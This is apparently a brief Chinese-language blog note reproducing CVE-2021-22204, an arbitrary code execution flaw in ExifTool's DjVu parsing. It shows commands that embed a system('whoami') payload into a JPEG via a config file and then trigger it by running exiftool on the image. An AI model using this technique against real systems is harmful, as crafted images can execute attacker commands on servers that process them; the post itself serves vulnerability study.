CVE-2021-22204:ExifTool任意代码执行
CVE-2021-22204 ExifTool任意代码执行
github poc下载
ExifTool 7.44至12.23在DjVu模块中存在一个错误,该错误允许在解析恶意图像时执行任意代码
meta-data为MIME Type : image/jpeg"即jpg图片可以达成RCE
exiftool -config eval.config mojave.jpg -eval='system("whoami")'
exiftool mojave.jpg
可以看到成功执行了命令
本博文仅限于博主个人学习和分享使用,请勿用于违法行为。如有侵权,请联系一定删除!
